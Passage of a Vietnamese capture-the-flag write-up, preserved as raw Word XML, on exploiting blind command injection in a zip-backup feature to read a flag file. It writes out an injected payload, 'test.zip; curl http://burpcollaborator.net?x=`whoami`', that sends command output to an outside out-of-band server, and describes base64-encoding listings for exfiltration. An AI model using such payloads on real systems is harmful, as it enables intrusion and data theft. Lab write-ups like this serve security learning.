    <w:p w14:paraId="4A22078B" w14:textId="653D9C6C" w:rsidR="00E24801" w:rsidRPr="00E24801" w:rsidRDefault="00304448" w:rsidP="00E24801">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E24801">
        <w:t xml:space="preserve">Hệ thống hiển thị backup không thành công, điều này không khẳng định được rằng có thể thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00675C21" w:rsidRPr="00E24801">
        <w:t xml:space="preserve">được lệnh shell hay </w:t>
      </w:r>
      <w:r w:rsidR="00E24801" w:rsidRPr="00E24801">
        <w:t xml:space="preserve">ko vì việc chèn thêm lệnh chỉ khiến </w:t>
      </w:r>
      <w:r w:rsidR="00E24801" w:rsidRPr="00E24801">
        <w:t xml:space="preserve">zip gặp lỗi hoặc bị gián đoạn do cú pháp sai </w:t>
      </w:r>
      <w:r w:rsidR="00E24801">
        <w:t xml:space="preserve">nên </w:t>
      </w:r>
      <w:r w:rsidR="0069799F">
        <w:t>lệnh chèn thêm có được thực thi hay không thì vẫn sẽ ra kết quả như vậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B1410" w14:textId="77777777" w:rsidR="00ED1A66" w:rsidRPr="00ED1A66" w:rsidRDefault="00294680" w:rsidP="00ED1A66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00294680">
        <w:t xml:space="preserve">Trong trường hợp ứng dụng không hiển thị kết quả thực thi lệnh (blind), việc xác định xem lệnh có được thực thi hay không trở nên khó khăn. Để giải quyết vấn đề này, </w:t>
      </w:r>
      <w:r>
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00294680">
        <w:t xml:space="preserve"> sử dụng kỹ thuật Out-of-Band (OAST), cho phép tạo ra một tương tác gián tiếp giữa hệ thống mục tiêu và một máy chủ bên ngoài do </w:t>
      </w:r>
      <w:r>
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00294680">
        <w:t xml:space="preserve"> kiểm soát.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ở đây mình sẽ sử dụng chức năng burp </w:t>
      </w:r>
      <w:r w:rsidR="003B3554">
        <w:t xml:space="preserve">collaborator và </w:t>
      </w:r>
      <w:r w:rsidR="00ED1A66" w:rsidRPr="00ED1A66">
        <w:t>tạo một payload sử dụng lệnh curl để gửi yêu cầu HTTP tới subdomain Burp Collaborator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220CE74" w14:textId="028D9557" w:rsidR="009D66D9" w:rsidRPr="00304448" w:rsidRDefault="009D66D9" w:rsidP="00294680">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9898F0" w14:textId="35F00492" w:rsidR="009D66D9" w:rsidRDefault="009D66D9">
      <w:r w:rsidRPr="009D66D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53EC21FD" wp14:editId="38F13186">
            <wp:extent cx="5731510" cy="1073785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1808980109"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80109" name="Picture 1" descr="A white rectangular object with a black border&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1073785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71530442" w14:textId="34569123" w:rsidR="00ED2A63" w:rsidRPr="00ED2A63" w:rsidRDefault="00ED2A63">
      <w:r>
        <w:t xml:space="preserve">Kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00671704">
        <w:t>Burp C</w:t>
      </w:r>
      <w:r w:rsidR="00671704" w:rsidRPr="00ED1A66">
        <w:t>ollaborator</w:t>
      </w:r>
      <w:r w:rsidR="00671704">
        <w:t xml:space="preserve"> và thấy đã có request được gửi </w:t>
      </w:r>
      <w:r w:rsidR="00D369AF">
        <w:t>tới, điều này xác nhận lệnh shell đã được thực thi</w:t>
      </w:r>
      <w:r w:rsidR="00671704">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D513205" w14:textId="0E62A96F" w:rsidR="009D66D9" w:rsidRDefault="009D66D9">
      <w:r w:rsidRPr="009D66D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A0AC7C2" wp14:editId="475A5C49">
            <wp:extent cx="5731510" cy="2322830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="5547359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35931" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2322830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1521E1B7" w14:textId="29F1A6F4" w:rsidR="00427E13" w:rsidRDefault="00427E13" w:rsidP="00427E13">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00427E13">
        <w:t>Sau khi xác nhận rằng hệ thống có thể thực thi lệnh curl, tôi tiếp tục thử nghiệm bằng cách chèn một lệnh shell vào tham số truy vấn HTTP để rò rỉ thông tin hệ thống</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bằng cách sử dụng câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00427E13">
        <w:t>test.zip; curl http://burpcollaborator.net?x=`whoami`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD705A" w14:textId="77777777" w:rsidR="00427E13" w:rsidRPr="00427E13" w:rsidRDefault="00427E13" w:rsidP="00427E13">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00427E13">
        <w:t>Lệnh này yêu cầu hệ thống thực thi whoami, sau đó gửi kết quả dưới dạng truy vấn HTTP tới máy chủ Burp Collaborator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30165A2C" w14:textId="77777777" w:rsidR="00427E13" w:rsidRPr="00427E13" w:rsidRDefault="00427E13" w:rsidP="00427E13">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AB65DC" w14:textId="77777777" w:rsidR="00D369AF" w:rsidRDefault="00D369AF"/>
    <w:p w14:paraId="55AFA5F7" w14:textId="77777777" w:rsidR="00D369AF" w:rsidRPr="00D369AF" w:rsidRDefault="00D369AF"/>
    <w:p w14:paraId="69912BED" w14:textId="5A595356" w:rsidR="00B1505E" w:rsidRDefault="00B1505E">
      <w:r w:rsidRPr="00B1505E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDEF970" wp14:editId="32EB4A51">
            <wp:extent cx="5731510" cy="1141095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="726909985" name="Picture 1" descr="A long black lin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09985" name="Picture 1" descr="A long black line on a white surface&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1141095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E5407" w14:textId="40093D87" w:rsidR="009A2CAD" w:rsidRPr="009A2CAD" w:rsidRDefault="009A2CAD">
      <w:r>
        <w:t>Lệnh whoami đã được thực thi và trả về trong request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F62C204" w14:textId="3BC173E3" w:rsidR="00B1505E" w:rsidRDefault="00B1505E">
      <w:r w:rsidRPr="00B1505E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0787A66E" wp14:editId="5E1ECF2E">
            <wp:extent cx="5731510" cy="1460500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1445864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64218" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1460500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD0D4A2" w14:textId="18CA1F8F" w:rsidR="009A2CAD" w:rsidRDefault="009A2CAD">
      <w:r>
        <w:t>Thực hiện tìm kiếm flag bằng câu lệnh ls /:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B62A60A" w14:textId="065C4EFD" w:rsidR="00F0623B" w:rsidRDefault="00F0623B">
      <w:r w:rsidRPr="00F0623B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4EEF7E" wp14:editId="1D8134E2">
            <wp:extent cx="5731510" cy="1158875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="543526154" name="Picture 1" descr="A white background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26154" name="Picture 1" descr="A white background with a black border&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1158875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ECE506" w14:textId="1F6F4D77" w:rsidR="009A2CAD" w:rsidRDefault="009A2CAD">
      <w:r>
        <w:t>Kết quả đã được gửi về:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CCB3C" w14:textId="22A4C7B5" w:rsidR="00F0623B" w:rsidRDefault="00F0623B">
      <w:r w:rsidRPr="00F0623B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="268E2EA4" wp14:editId="6BAB4DD5">
            <wp:extent cx="5731510" cy="1452245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1766923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23096" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1452245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E65E56" w14:textId="462CE4C1" w:rsidR="00462765" w:rsidRDefault="009A2CAD" w:rsidP="00B831F2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ta có thể thấy kết quả gửi về được </w:t>
      </w:r>
      <w:r w:rsidR="00B269BB">
        <w:t xml:space="preserve">hiển thị trong gói tin http, tuy nhiên chỉ có 1 file, tập tin được gửi về. Điều này có thể xảy ra vì kết quả trả về đc hiển thị trên từng dòng. Và để có thể hiển thị được hết, mình sẽ thực hiện mã hóa base64 kết quả của câu lệnh để chúng </w:t>
      </w:r>
      <w:r w:rsidR="00B831F2">
        <w:t>đều cùng 1 dòng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C66E4" w14:textId="37509C90" w:rsidR="00462765" w:rsidRDefault="00462765">
      <w:r w:rsidRPr="00462765">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A9300C1" wp14:editId="700B375F">
            <wp:extent cx="5731510" cy="1011382"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1402220538"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20538" name="Picture 1" descr="A white rectangular object with a black border&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId31"/>
                    <a:srcRect t="-1" b="7021"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1011382"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C3728" w14:textId="225947FB" w:rsidR="00B831F2" w:rsidRDefault="00B831F2" w:rsidP="00B831F2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả trả về đã được mã hóa base 64. Ở góc bên phải màn hình là bản rõ của nó bao gồm toàn bộ kết quả trong ls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6029D17C" w14:textId="795838E9" w:rsidR="00462765" w:rsidRDefault="00462765">
      <w:r w:rsidRPr="00462765">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5745F9F3" wp14:editId="6F23E0BE">
            <wp:extent cx="5731510" cy="1096010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1269747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47586" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1096010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A91572" w14:textId="25844868" w:rsidR="006F7FE5" w:rsidRDefault="006F7FE5" w:rsidP="000068F1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ngoài ra vì mình biết ở thư mục gốc </w:t>
      </w:r>
      <w:r w:rsidR="00090903">
        <w:t xml:space="preserve">chỉ có 1 file có đuôi txt là file flag nên mình sẽ đọc file *.txt </w:t>
      </w:r>
      <w:r w:rsidR="000068F1">
        <w:t>luôn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD06F7A" w14:textId="21A40037" w:rsidR="00462765" w:rsidRDefault="00462765">
      <w:r w:rsidRPr="00462765">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA8F1C2" wp14:editId="4FC59475">
            <wp:extent cx="5731510" cy="1105535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1216604384"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4384" name="Picture 1" descr="A white rectangular object with black lines&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1105535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA8BD1" w14:textId="731C21C8" w:rsidR="000068F1" w:rsidRDefault="000068F1">
      <w:r>
        <w:t>Thành công lấy được flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B76399" w14:textId="4EAB861F" w:rsidR="001B7A80" w:rsidRDefault="001B7A80">
      <w:r w:rsidRPr="001B7A80">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254538A4" wp14:editId="38893797">
            <wp:extent cx="5731510" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="613346459"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46459" name="Picture 1" descr="A screenshot of a video&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1304925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB9BD7" w14:textId="77777777" w:rsidR="001B7A80" w:rsidRDefault="001B7A80"/>
    <w:p w14:paraId="24A324A2" w14:textId="77777777" w:rsidR="001B7A80" w:rsidRDefault="001B7A80"/>
    <w:p w14:paraId="1D2140B6" w14:textId="77777777" w:rsidR="000068F1" w:rsidRDefault="000068F1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE70AC" w14:textId="16366956" w:rsidR="000068F1" w:rsidRPr="00FF23DE" w:rsidRDefault="000068F1" w:rsidP="006C2EE6">
      <w:pPr>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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40257065" w14:textId="77777777" w:rsidR="000068F1" w:rsidRPr="00FF23DE" w:rsidRDefault="000068F1" w:rsidP="000068F1">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566"/>
      </w:tblGrid>
      <w:tr w:rsidR="003402FD" w:rsidRPr="003402FD" w14:paraId="2AA8182C" w14:textId="77777777" w:rsidTr="003402FD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1604EE29" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5631484D" w14:textId="0C2B5843" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BAF8EA9" w14:textId="75E5BBF5" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5900B752" w14:textId="096899FF" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B859B09" w14:textId="0CE88602" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F995E5F" w14:textId="4F69C14F" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C61B88" w14:textId="2729D196" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7D2CC4" w14:textId="0A5A31D3" w:rsidR="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="201B1304" w14:textId="043EE253" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B5356D" w14:textId="41362652" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47CF808C" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E834E8D" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E69734F" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E794961" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E010A79" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FB7DBA" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43132422" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="505E04D7" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41EC99CD" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD52451" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07DEFEE9" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E5EF10" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6010F80D" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0608F041" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FF5A5D0" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE6D8E2" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C1B120C" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="059015D4" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03A213BA" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>(isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
